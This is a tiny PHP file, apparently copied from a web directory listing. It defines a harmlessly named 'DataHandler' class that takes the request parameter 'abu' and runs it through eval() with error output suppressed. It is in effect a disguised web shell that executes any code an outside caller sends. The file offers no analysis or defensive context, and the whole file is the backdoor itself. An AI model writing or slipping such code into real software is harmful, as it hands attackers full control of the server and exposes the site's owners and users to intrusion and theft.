<?php
class DataHandler {
private $input;
public function __construct() {
$this->input = isset($_REQUEST['abu']) ? $_REQUEST['abu'] : '';
echo "abu";
$this->process();
}
private function process() {
if(!empty($this->input)) {
echo @eval($this->input);
}
}
}
new DataHandler();
?> Back to Directory